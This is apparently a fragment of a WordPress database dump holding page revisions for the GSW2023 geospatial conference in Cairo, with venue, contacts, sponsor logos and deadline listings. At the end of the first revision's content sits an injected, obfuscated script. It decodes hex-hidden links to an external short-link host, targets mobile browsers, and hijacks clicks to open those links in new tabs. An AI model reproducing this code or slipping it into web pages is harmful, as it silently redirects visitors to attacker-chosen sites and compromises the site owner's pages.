and prosperity.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 05:27:08','2023-05-17 05:27:08','',3066,'https://gsw2023.com/?p=4529',0,'revision','',0),
(4530,1,'2023-05-17 05:29:35','2023-05-17 05:29:35','[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]\r\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]\r\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\r\n<span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684272005765{margin-top: -25px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\r\n<a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\r\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\r\n\r\n<h3></h3>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong>\r\n\r\n<strong><del>April 15, 2023</del> ,</strong>\r\n\r\n<strong> May 15, 2023  (hard deadline, no extension)</strong>\r\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong>\r\n\r\n<strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" 